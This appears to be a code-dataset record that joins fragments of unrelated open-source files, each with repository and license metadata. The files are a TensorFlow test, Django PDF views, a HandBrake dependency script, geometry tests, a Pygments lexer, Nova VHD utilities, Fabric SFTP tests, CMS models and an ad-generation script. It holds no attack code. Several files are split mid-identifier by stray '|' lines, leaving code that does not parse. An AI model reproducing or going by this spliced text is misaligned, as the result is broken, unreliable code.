print('vars flattened = ', flatten_vars)
self.assertEqual(len(flatten_vars), 238)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self, dtype=tf.float32, fprop_dtype=tf.float32):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.dtype = dtype
if fprop_dtype:
p.fprop_dtype = fprop_dtype
p.input.dtype = fprop_dtype
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.99771, 10.377038], [243.92978, 10.379991],
[260.7751, 10.379107], [201.10846, 10.379791],
[272.22006, 10.370288]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = ', vals)
self.assertAllClose(vals, [(226.99771, 10.377038), (243.92978, 10.379991),
(260.7751, 10.379107), (201.10846, 10.379791),
(272.22006, 10.370288)])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('BProp
|
CallmeTorre/Idalia
|
ESCOM/ConsultarDocumento/views.py
|
Python
|
apache-2.0
| 2,955 | 0.012864 |
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.views.generic import View
from django.http import HttpResponse
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units
|
import inch
from reportlab.platypus import (Flowable, Paragraph,
Simp
|
leDocTemplate, Spacer)
from .models import TablaSolicitud
from .models import Bitacora
from .models import TablaAlumno
# Create your views here.
class ConsultarDocumento(View):
template_name = "consultarDocumento.html"
def get(self, request):
return render(
request,
self.template_name,
)
class VerDocumento(View):
template_name = "verDocumento.html"
model = TablaAlumno
model2 = TablaSolicitud
def get(self, request, folio):
self.request.session['errorConsulta'] = None
print(folio)
context = dict()
try:
alumn=self.model.objects.get(codigo = folio)
except:
self.request.session['errorConsulta'] = "Es incorrecto el código insertado"
return redirect('consultar')
context['solicitudes'] = self.model2.objects.filter(alumno_id=alumn.id)
return render(
request,
self.template_name,
context
)
class VerPdf(View):
template_name = "verPdf.html"
model = TablaSolicitud
model2 = TablaAlumno
def get(self, request, id, solicitudId):
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="Documento.pdf"'
p = canvas.Canvas(response)
alumno = self.model2.objects.get(codigo=id)
bitacora = self.model.objects.get(id = solicitudId)
# x,y
p.setFont("Helvetica", 16)
p.drawCentredString(260,800,"INSTITUTO POLITECNICO NACIONAL")
p.drawCentredString(260,770,"ESCUELA SUPERIOR DE COMPUTO")
p.drawCentredString(280,740,"SUBDIRECCION DE SERVIVIOS EDUCATIVOS E INTEGRACION SOCIAL")
p.line(120,700,580,700)
p.setFont("Helvetica", 12)
p.drawCentredString(260,715,"DEPARTAMENTO DE GESTION ESCOLAR")
p.drawCentredString(260,700,str(bitacora.documento))
p.drawCentredString(100,695,"A QUIEN CORRESPONDA:")
p.drawCentredString(100,670,"HACE CONSTAR QUE EL ALUMNO")
p.drawCentredString(260,650,str(bitacora.alumno))
p.drawCentredString(100,630,"CON NUMERO DE BOLETA")
p.drawCentredString(230,630,str(bitacora.alumno.boleta))
p.drawCentredString(380,630,"ESTA INSCRITO EN ESTE PLANTEL");
p.drawCentredString(200, 600, str(bitacora.fecha))
p.drawCentredString(200, 610, str(bitacora.estado))
p.drawCentredString(200, 620, str(bitacora.folio))
p.showPage()
p.save()
return response
|
utensil-star/HandBrake
|
gtk/src/makedeps.py
|
Python
|
gpl-2.0
| 5,589 | 0.004831 |
#! /usr/bin/python
import collections
import sys
import json
DepEntry = collections.namedtuple('DepEntry', 'widget dep enable die hide')
dep_map = (
DepEntry("title", "queue_add", "none", True, False),
DepEntry("title", "queue_add_menu", "none", True, False),
DepEntry("title", "queue_add_multiple_menu", "none", True, False),
DepEntry("title", "preview_frame", "none", True, False),
DepEntry("title", "picture_summary", "none", True, False),
DepEntry("title", "picture_summary2", "none", True, False),
DepEntry("title", "chapters_tab", "none", True, False),
DepEntry("title", "start_point", "none", True, False),
DepEntry("title", "end_point", "none", True, False),
DepEntry("title", "angle", "none", True, False),
DepEntry("title", "angle_label", "1", True, False),
DepEntry("use_dvdnav", "angle", "0", True, True),
DepEntry("use_dvdnav", "angle_label", "0", True, True),
DepEntry("angle_count", "angle", "1", True, True),
DepEntry("angle_count", "angle_label", "1", True, True),
DepEntry("vquality_type_bitrate", "VideoAvgBitrate", "1", False, False),
DepEntry("vquality_type_constant", "VideoQualitySlider", "1", False, False),
DepEntry("vquality_type_constant", "VideoTwoPass", "1", True, False),
DepEntry("vquality_type_constant", "VideoTurboTwoPass", "1", True, False),
DepEntry("VideoFramerate", "VideoFrameratePFR", "source", True, True),
DepEntry("VideoFramerate", "VideoFramerateVFR", "source", False, True),
DepEntry("VideoTwoPass", "VideoTurboTwoPass", "1", False, False),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlace", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceCustom", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceLabel", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecomb", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombCustom", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombLabel", "0", True, True),
DepEntry("PictureDeinterlace", "PictureDeinterlaceCustom", "custom", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePreset", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePresetLabel", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTune", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTuneLabel", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseCustom", "off", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseCustom", "custom", False, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTune", "custom", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTuneLabel", "custom", True, True),
DepEntry("PictureDecomb", "PictureDecombCustom", "custom", False, True),
DepEntry("PictureDetelecine", "PictureDetelecineCustom", "custom", False, True),
DepEntry("PictureWidthEnable", "PictureWidth", "1", False, False),
DepEntry("PictureHeightEnable", "PictureHeight", "1", False, False),
DepEntry("PictureAutoCrop", "PictureTopCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureBottomCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureLeftCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureRightCrop", "0", False, False),
DepEntry("x264_bframes", "x264_bpyramid", "<2", True, False),
DepEntry("x264_bframes", "x264_direct", "0", True, False),
DepEntry("x264_bframes", "x264_b_adapt", "0", True, False),
DepEntry("x264_subme", "x264_psy_rd", "<6", True, False),
DepEntry("x264_subme", "x264_psy_trell", "<6", True, False),
DepEntry("x264_trellis", "x264_psy_trell", "0", True, False),
DepEntry("VideoEncoder", "x264FastDecode", "x264", False, True),
DepEntry("VideoEncoder", "x264UseAdvancedOptions", "x264", False, True),
DepEntry("HideAdvancedVideoSettings", "x264UseAdvancedOptions", "1", True, True),
DepEntry("VideoEncoder", "VideoOptionExtraWindow", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("VideoEncoder", "VideoOptionExtraLabel", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("x264UseAdvancedOptions", "VideoSettingsTable", "1", True, False),
DepEntry("VideoEncoder", "x264_box", "x264", False, True),
DepEntry("x264UseAdvancedOptions", "x264_box", "0", True, False),
DepEntry("auto_name", "autoname_box", "1", False, False),
)
def main():
try:
depsfile = open("widget.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err) )
sys.exit(1)
try:
revfile = open("widget_reverse.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err))
sys.exit(1)
|
top = dict()
for ii in dep_map:
if ii.widget in top:
|
continue
deps = list()
for jj in dep_map:
if jj.widget == ii.widget:
deps.append(jj.dep)
top[ii.widget] = deps
json.dump(top, depsfile, indent=4)
top = dict()
for ii in dep_map:
if ii.dep in top:
continue
deps = list()
for jj in dep_map:
if ii.dep == jj.dep:
rec = list()
rec.append(jj.widget)
rec.append(jj.enable)
rec.append(jj.die)
rec.append(jj.hide)
deps.append(rec)
top[ii.dep] = deps
json.dump(top, revfile, indent=4)
main()
|
sernst/RefinedStatistics
|
measurement_stats/test/test_value2D.py
|
Python
|
mit
| 2,275 | 0.002198 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import math
import random
import unittest
from measurement_stats import angle
|
from measurement_stats import value
from measu
|
rement_stats import value2D
HALF_SQRT_2 = 0.5 * math.sqrt(2.0)
HALF_SQRT_3 = 0.5 * math.sqrt(3.0)
class TestValue2D(unittest.TestCase):
def test_angleBetween(self):
p1 = value2D.Point2D(
value.ValueUncertainty(2.0, 0.1),
value.ValueUncertainty(0.0, 0.1) )
p2 = value2D.Point2D(
value.ValueUncertainty(0.0, 0.1),
value.ValueUncertainty(2.0, 0.1) )
a = p1.angle_between(p2)
self.assertAlmostEquals(a.degrees, 90.0, 1)
def test_rotate(self):
tests = [
(90.0, 0.0, 1.0), (-90.0, 0.0, -1.0),
(180.0, -1.0, 0.0), (-180.0, -1.0, 0.0),
(270.0, 0.0, -1.0), (-270.0, 0.0, 1.0),
(360.0, 1.0, 0.0), (-360.0, 1.0, 0.0),
(45.0, HALF_SQRT_2, HALF_SQRT_2),
(-45.0, HALF_SQRT_2, -HALF_SQRT_2),
(315.0, HALF_SQRT_2, -HALF_SQRT_2),
(-315.0, HALF_SQRT_2, HALF_SQRT_2),
(30.0, HALF_SQRT_3, 0.5), (-30.0, HALF_SQRT_3, -0.5),
(330.0, HALF_SQRT_3, -0.5), (-330.0, HALF_SQRT_3, 0.5) ]
for test in tests:
radius = random.uniform(0.001, 1000.0)
p = value2D.Point2D(
value.ValueUncertainty(radius, 0.25),
value.ValueUncertainty(0.0, 0.25) )
p.rotate(angle.Angle(degrees=test[0]))
self.assertAlmostEqual(p.x.raw, radius * test[1], 2)
self.assertAlmostEqual(p.y.raw, radius * test[2], 2)
def test_projection(self):
"""
:return:
"""
line_start = value2D.create_point(0, 0)
line_end = value2D.create_point(1, 1)
point = value2D.create_point(0, 1)
result = value2D.closest_point_on_line(point, line_start, line_end)
self.assertIsNotNone(result)
print('PROJECTION:', result)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestValue2D)
unittest.TextTestRunner(verbosity=2).run(suite)
|
wakatime/wakatime
|
wakatime/packages/py27/pygments/lexers/capnproto.py
|
Python
|
bsd-3-clause
| 2,194 | 0 |
# -*- coding: utf-8 -*-
"""
pygments.lexers.capnproto
~~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Cap'n Proto schema language.
:copyright: Copyright 2006-2019 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default
from pygments.token import Text, Comment, Keyword, Name, Literal
__all__ = ['CapnProtoLexer']
class CapnProtoLexer(RegexLexer):
"""
For `Cap'n Proto <https://capnproto.org>`_ source.
.. versionadded:: 2.2
"""
name = 'Cap\'n Proto'
filenames = ['*.capnp']
aliases = ['capnp']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'#.*?$', Comment.Single),
(r'@[0-9a-zA-Z]*', Name.Decorator),
(r'=', Literal, 'expression'),
(r':', Name.Class, 'type'),
(r'\$', Name.Attribute, 'annotation'),
(r'(struct|enum|interface|union|import|using|const|annotation|'
r'extends|in|of|on|as|with|from|fixed)\b',
Keyword),
(r'[\w.]+', Name),
(r'[^#@=:$\w]+', Text),
],
'type': [
(r'[^][=;,(){}$]+', Name.Class),
(r'[\[(]', Name.Class, 'parentype'),
default('#pop'),
],
'parentype': [
(r'[^][;()]+', Name.Class),
(r'[\[(]', Name.Class, '#push'),
(r'[])]', Name.Class, '#pop'),
default('#pop'),
],
'expression': [
(r'[^][;,(){}$]+', Literal),
(r'[\[(]', Literal, 'pa
|
renexp'),
default('#pop'),
],
'parenexp': [
(r'[^][;()]+', Literal),
(r'[\[(]', Literal, '#push'),
(r'[])
|
]', Literal, '#pop'),
default('#pop'),
],
'annotation': [
(r'[^][;,(){}=:]+', Name.Attribute),
(r'[\[(]', Name.Attribute, 'annexp'),
default('#pop'),
],
'annexp': [
(r'[^][;()]+', Name.Attribute),
(r'[\[(]', Name.Attribute, '#push'),
(r'[])]', Name.Attribute, '#pop'),
default('#pop'),
],
}
|
ntt-sic/nova
|
nova/virt/hyperv/vhdutils.py
|
Python
|
apache-2.0
| 7,795 | 0.000257 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility class for VHD related operations.
Official VHD format specs can be retrieved at:
http://technet.microsoft.com/en-us/library/bb676673.aspx
See "Download the Specifications Without Registering"
Official VHDX format specs can be retrieved at:
http://www.microsoft.com/en-us/download/details.aspx?id=34750
"""
import struct
import sys
if sys.platform == 'win32':
import wmi
from nova.openstack.common.gettextutils import _
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
from xml.etree import ElementTree
VHD_HEADER_SIZE_FIX = 512
VHD_BAT_ENTRY_SIZE = 4
VHD_DYNAMIC_DISK_HEADER_SIZE = 1024
VHD_HEADER_SIZE_DYNAMIC = 512
VHD_FOOTER_SIZE_DYNAMIC = 512
VHD_BLK_SIZE_OFFSET = 544
VHD_SIGNATURE = 'conectix'
VHDX_SIGNATURE = 'vhdxfile'
class VHDUtils(object):
def __init__(self):
self._vmutils = vmutils.VMUtils()
if sys.platform == 'win32':
self._conn = wmi.WMI(moniker='//./root/virtualization')
def validate_vhd(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ValidateVirtualHardDisk(
Path=vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def create_dynamic_vhd(self, path, max_internal_size, format):
if format != constants.DISK_FORMAT_VHD:
raise vmutils.HyperVException(_("Unsupported disk format: %s") %
format)
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDynamicVirtualHardDisk(
Path=path, MaxInternalSize=max_internal_size)
self._vmutils.check_ret_val(ret_val, job_path)
def create_differencing_vhd(self, path, parent_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.CreateDifferencingVirtualHardDisk(
Path=path, ParentPath=parent_path)
self._vmutils.check_ret_val(ret_val, job_path)
def reconnect_parent_vhd(self, child_vhd_path, parent_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.ReconnectParentVirtualHardDisk(
ChildPath=child_vhd_path,
ParentPath=parent_vhd_path,
Force=True)
self._vmutils.check_ret_val(ret_val, job_path)
def merge_vhd(self, src_vhd_path, dest_vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(job_path, ret_val) = image_man_svc.MergeVirtualHardDisk(
SourcePath=src_vhd_path,
DestinationPath=dest_vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
def resize_vhd(self, vhd_path, new_max_size, is_file_max_size=True):
if is_file_max_size:
new_internal_max_size = self.get_internal_vhd_size_by_file_size(
vhd_path, new_max_size)
else:
new_internal_max_size = new_max_size
image_man_svc = self._conn.Msvm_ImageManagem
|
entService()[0]
(job_path, ret_val) = image_man_svc.ExpandVirtualHardDisk(
Path=vhd_path, MaxInternalSize=new_internal_max_size)
self._vmutils.check_ret_val(ret
|
_val, job_path)
def get_internal_vhd_size_by_file_size(self, vhd_path, new_vhd_file_size):
"""Fixed VHD size = Data Block size + 512 bytes
Dynamic_VHD_size = Dynamic Disk Header
+ Copy of hard disk footer
+ Hard Disk Footer
+ Data Block
+ BAT
Dynamic Disk header fields
Copy of hard disk footer (512 bytes)
Dynamic Disk Header (1024 bytes)
BAT (Block Allocation table)
Data Block 1
Data Block 2
Data Block n
Hard Disk Footer (512 bytes)
Default block size is 2M
BAT entry size is 4byte
"""
base_vhd_info = self.get_vhd_info(vhd_path)
vhd_type = base_vhd_info['Type']
if vhd_type == constants.VHD_TYPE_FIXED:
vhd_header_size = VHD_HEADER_SIZE_FIX
return new_vhd_file_size - vhd_header_size
elif vhd_type == constants.VHD_TYPE_DYNAMIC:
bs = self._get_vhd_dynamic_blk_size(vhd_path)
bes = VHD_BAT_ENTRY_SIZE
ddhs = VHD_DYNAMIC_DISK_HEADER_SIZE
hs = VHD_HEADER_SIZE_DYNAMIC
fs = VHD_FOOTER_SIZE_DYNAMIC
max_internal_size = (new_vhd_file_size -
(hs + ddhs + fs)) * bs / (bes + bs)
return max_internal_size
else:
raise vmutils.HyperVException(_("The %(vhd_type)s type VHD "
"is not supported") %
{"vhd_type": vhd_type})
def _get_vhd_dynamic_blk_size(self, vhd_path):
blk_size_offset = VHD_BLK_SIZE_OFFSET
try:
with open(vhd_path, "rb") as f:
f.seek(blk_size_offset)
version = f.read(4)
except IOError:
raise vmutils.HyperVException(_("Unable to obtain block size from"
" VHD %(vhd_path)s") %
{"vhd_path": vhd_path})
return struct.unpack('>i', version)[0]
def get_vhd_parent_path(self, vhd_path):
return self.get_vhd_info(vhd_path).get("ParentPath")
def get_vhd_info(self, vhd_path):
image_man_svc = self._conn.Msvm_ImageManagementService()[0]
(vhd_info,
job_path,
ret_val) = image_man_svc.GetVirtualHardDiskInfo(vhd_path)
self._vmutils.check_ret_val(ret_val, job_path)
vhd_info_dict = {}
et = ElementTree.fromstring(vhd_info)
for item in et.findall("PROPERTY"):
name = item.attrib["NAME"]
value_text = item.find("VALUE").text
if name == "ParentPath":
vhd_info_dict[name] = value_text
elif name in ["FileSize", "MaxInternalSize"]:
vhd_info_dict[name] = long(value_text)
elif name in ["InSavedState", "InUse"]:
vhd_info_dict[name] = bool(value_text)
elif name == "Type":
vhd_info_dict[name] = int(value_text)
return vhd_info_dict
def get_vhd_format(self, path):
with open(path, 'rb') as f:
# Read header
if f.read(8) == VHDX_SIGNATURE:
return constants.DISK_FORMAT_VHDX
# Read footer
f.seek(0, 2)
file_size = f.tell()
if file_size >= 512:
f.seek(-512, 2)
if f.read(8) == VHD_SIGNATURE:
return constants.DISK_FORMAT_VHD
raise vmutils.HyperVException(_('Unsupported virtual disk format'))
def get_best_supported_vhd_format(self):
return constants.DISK_FORMAT_VHD
|
jaraco/fabric
|
tests/test_server.py
|
Python
|
bsd-2-clause
| 2,975 | 0 |
"""
Tests for the test server itself.
Not intended to be run by the greater test suite, only by specifically
targeting it on the command-line. Rationale: not really testing Fabric itself,
no need to pollute Fab's own test suite. (Yes, if these tests fail, it's likely
that the Fabric tests using the test server may also have issues, but still.)
"""
__test__ = False
from nose.tools import eq_, ok_
from fabric.network import ssh
from server import FakeSFTPServer
class AttrHolder(object):
pass
def test_list_folder():
for desc, file_map, arg, expected in (
(
"Single file",
{'file.txt': 'contents'},
'',
['file.txt']
),
(
"Single absolute file",
{'/file.txt': 'contents'},
'/',
|
['file.txt']
),
(
"Multiple files",
{'file1.txt': 'contents', 'file2.txt': 'contents2'},
'',
['file1.txt', 'file2.txt']
),
(
"Single empty folder",
|
{'folder': None},
'',
['folder']
),
(
"Empty subfolders",
{'folder': None, 'folder/subfolder': None},
'',
['folder']
),
(
"Non-empty sub-subfolder",
{'folder/subfolder/subfolder2/file.txt': 'contents'},
"folder/subfolder/subfolder2",
['file.txt']
),
(
"Mixed files, folders empty and non-empty, in homedir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'empty_folder': None
},
'',
['file.txt', 'file2.txt', 'folder', 'empty_folder']
),
(
"Mixed files, folders empty and non-empty, in subdir",
{
'file.txt': 'contents',
'file2.txt': 'contents2',
'folder/file3.txt': 'contents3',
'folder/subfolder/file4.txt': 'contents4',
'empty_folder': None
},
"folder",
['file3.txt', 'subfolder']
),
):
# Pass in fake server obj. (Can't easily clean up API to be more
# testable since it's all implementing 'ssh' interface stuff.)
server = AttrHolder()
server.files = file_map
interface = FakeSFTPServer(server)
results = interface.list_folder(arg)
# In this particular suite of tests, all results should be a file list,
# not "no files found"
ok_(results != ssh.SFTP_NO_SUCH_FILE)
# Grab filename from SFTPAttribute objects in result
output = map(lambda x: x.filename, results)
# Yield test generator
eq_.description = "list_folder: %s" % desc
yield eq_, set(expected), set(output)
del eq_.description
|
cmjatai/cmj
|
cmj/sigad/models.py
|
Python
|
gpl-3.0
| 49,449 | 0.000243 |
from datetime import datetime
import io
import os
import tempfile
import zipfile
from PIL import Image, ImageFont
from PIL.Image import LANCZOS
from PIL.ImageDraw import Draw
from django.conf import settings
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.fields.jsonb import JSONField
from django.core import serializers
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.base import File
from django.core.files.storage import FileSystemStorage
from django.core.serializers.json import DjangoJSONEncoder
from django.db import models
from django.db.models import Q, F
from django.db.models.deletion import PROTECT, CASCADE
from django.http.response import HttpResponse
from django.utils import timezone
from django.utils.functional import cached_property
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from django_extensions.db.fields.json import JSONField as django_extensions_JSONField
from reportlab.lib.pagesizes import A4, landscape
from reportlab.pdfgen import canvas
from reportlab.platypus.doctemplate import SimpleDocTemplate
import qrcode
from cmj import globalrules
from cmj.core.models import AuditLog
from cmj.mixins import CmjChoices
from cmj.utils import get_settings_auth_user_model, YES_NO_CHOICES, \
restringe_tipos_de_arquivo_midias, TIPOS_IMG_PERMITIDOS, \
media_protected_storage
from sapl.materia.models import MateriaLegislativa
from sapl.parlamentares.models import Parlamentar
CLASSE_ESTRUTURAL = 0
CLASSE_DOCUMENTAL = 1
CLASSE_MISTA = 2
PERFIL_CLASSE = ((
CLASSE_ESTRUTURAL, _('Classe Estrutural')),
(
CLASSE_DOCUMENTAL, _('Classe de Conteúdo')),
(
CLASSE_MISTA, _('Classe Mista'))
)
DOC_TEMPLATES_CHOICE_FILES = {
1: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
2: {
'template_name': 'path/path_thumbnails.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
99: {
'template_name': 'path/path_documento.html',
'create_url': 'cmj.sigad:documento_construct_create'
},
}
DOC_TEMPLATES_CHOICE = CmjChoices(
(1, 'noticia', _('Notícia Pública')),
(2, 'galeria', _('Galeria de Imagens')),
)
CLASSE_TEMPLATES_CHOICE_FILES = {
1: 'path/path_classe.html',
2: 'path/path_galeria.html',
3: 'path/path_parlamentares.html',
4: 'path/path_parlamentar.html',
5: 'path/path_galeria.html',
6: 'path/path_classe.html',
7: 'path/path_galeria_video.html',
99: 'path/path_documento.html',
}
CLASSE_DOC_MANAGER_CHOICE = {
1: 'qs_news',
2: 'view_public_gallery',
3: 'qs_news',
4: 'qs_news',
5: 'qs_bi',
6: 'qs_audio_news',
7: 'qs_video_news',
99: None,
}
CLASSE_TEMPLATES_CHOICE = CmjChoices(
(1, 'lista_em_linha', _('Listagem em Linha')),
(2, 'galeria', _('Galeria Albuns')),
(3, 'parlamentares', _('Página dos Parlamentares')),
(4, 'parlamentar', _('Página individual de Parlamentar')),
(5, 'fotografia', _('Banco de Imagens')),
(6, 'galeria_audio', _('Galeria de Áudios')),
(7, 'galeria_video', _('Galeria de Vídeos')),
(99, 'documento_especifico', _('Documento Específico')),
)
class Parent(models.Model):
parent = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='childs',
verbose_name=_('Filhos'),
on_delete=PROTECT)
raiz = models.ForeignKey(
'self',
blank=True, null=True, default=None,
related_name='nodes',
verbose_name=_('Containers'),
on_delete=PROTECT)
related_classes = models.ManyToManyField(
'self', blank=True,
verbose_name=_('Classes Relacionadas'))
class Meta:
abstract = True
@property
def parents(self):
if not self.parent:
return []
parents = self.parent.parents + [self.parent, ]
return parents
@property
def parents_and_me(self):
if not self.parent:
return [self]
parents = self.parent.parents + [self.parent, self]
return parents
@property
def classes_parents(self):
if not hasattr(self, 'classe'):
return self.parents
_p = self.parents
p = _p or [self]
parents = p[0].classe.parents_and_me + _p
return parents
@property
def classes_parents_and_me(self):
if not hasattr(self, 'classe'):
return self.parents_and_me
p = self.parents_and_me
|
parents = p[0].classe.parents_and_me + p
return parents
def treechilds2list(self):
yield self
for child in self.childs.view_childs():
for item in child.treechilds2list():
yield item
class CMSMixin(models.Model):
|
STATUS_PRIVATE = 99
STATUS_RESTRICT = 1
STATUS_PUBLIC = 0
VISIBILIDADE_STATUS = CmjChoices(
(STATUS_RESTRICT, 'status_restrict', _('Restrito')),
(STATUS_PUBLIC, 'status_public', _('Público')),
(STATUS_PRIVATE, 'status_private', _('Privado')),
)
ALINHAMENTO_LEFT = 0
ALINHAMENTO_JUSTIFY = 1
ALINHAMENTO_RIGHT = 2
ALINHAMENTO_CENTER = 3
alinhamento_choice = CmjChoices(
(ALINHAMENTO_LEFT, 'alinhamento_left', _('Alinhamento Esquerdo')),
(ALINHAMENTO_JUSTIFY, 'alinhamento_justify', _('Alinhamento Completo')),
(ALINHAMENTO_RIGHT, 'alinhamento_right', _('Alinhamento Direito')),
(ALINHAMENTO_CENTER, 'alinhamento_center', _('Alinhamento Centralizado')),
)
TD_NEWS = 0
TD_DOC = 5
TD_BI = 10
TD_GALERIA_PUBLICA = 20
TD_AUDIO_NEWS = 30
TD_VIDEO_NEWS = 40
TPD_TEXTO = 100
TPD_FILE = 200
TPD_CONTAINER_SIMPLES = 700
TPD_CONTAINER_EXTENDIDO = 701
TPD_CONTAINER_FILE = 750
TPD_VIDEO = 800
TPD_AUDIO = 850
TPD_IMAGE = 900
TPD_GALLERY = 901
# Documentos completos
TDs = (TD_NEWS, TD_DOC, TD_BI, TD_GALERIA_PUBLICA,
TD_AUDIO_NEWS, TD_VIDEO_NEWS)
# Containers
TDc = (TPD_CONTAINER_SIMPLES, TPD_CONTAINER_EXTENDIDO, TPD_CONTAINER_FILE)
# Partes
TDp = (TPD_TEXTO, TPD_FILE, TPD_VIDEO, TPD_AUDIO, TPD_IMAGE, TPD_GALLERY)
# Tipos não acessiveis diretamente via URL
TDp_exclude_render = (TPD_TEXTO,
TPD_CONTAINER_SIMPLES,
TPD_CONTAINER_EXTENDIDO,
TPD_VIDEO,
TPD_AUDIO)
tipo_parte_doc = {
'documentos': CmjChoices(
(TD_NEWS, 'td_news', _('Notícias')),
(TD_DOC, 'td_doc', _('Documento')),
(TD_BI, 'td_bi', _('Banco de Imagem')),
(TD_GALERIA_PUBLICA, 'td_galeria_publica', _('Galeria Pública')),
(TD_AUDIO_NEWS, 'td_audio_news', _('Áudio Notícia')),
(TD_VIDEO_NEWS, 'td_video_news', _('Vídeo Notícia')),
),
'containers': CmjChoices(
(TPD_CONTAINER_SIMPLES,
'container', _('Container Simples')),
(TPD_CONTAINER_EXTENDIDO,
'container_fluid', _('Container Extendido')),
(TPD_CONTAINER_FILE,
'container_file', _('Container de Imagens para Arquivo PDF')),
),
'subtipos': CmjChoices(
(TPD_TEXTO, 'tpd_texto', _('Texto')),
(TPD_FILE, 'tpd_file', _('Arquivo')),
(TPD_VIDEO, 'tpd_video', _('Vídeo')),
(TPD_AUDIO, 'tpd_audio', _('Áudio')),
(TPD_IMAGE, 'tpd_image', _('Imagem')),
(TPD_GALLERY, 'tpd_gallery', _('Galeria de Imagens')),
)
}
tipo_parte_doc_choice = (tipo_parte_doc['documentos'] +
tipo_parte_doc['containers'] +
tipo_parte_doc['subtipos'])
created = models.DateTimeField(
verbose_name=_('created'), editable=False, auto_now_add=True)
public_date = models.DateTimeField(
null=True, default=None,
verbose_n
|
tsantor/banner-ad-toolkit
|
adkit/generate_html.py
|
Python
|
mit
| 5,427 | 0.00129 |
# -- coding: utf-8 --
# Copyright 2015 Tim Santor
#
# This file is part of proprietary software and use of this file
# is strictly prohibited without written consent.
#
# @author Tim Santor <tsantor@xstudios.agency>
"""Generates HTML for HTML5 banner ads."""
# -----------------------------------------------------------------------------
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import logging
import os
import re
import shlex
import shutil
import time
from subprocess import PIPE, Popen
import pkg_resources
import six
import six.moves.configparser as configparser
from bashutils import logmsg
from .adkit import AdKitBase
# -----------------------------------------------------------------------------
class Main(AdKitBase):
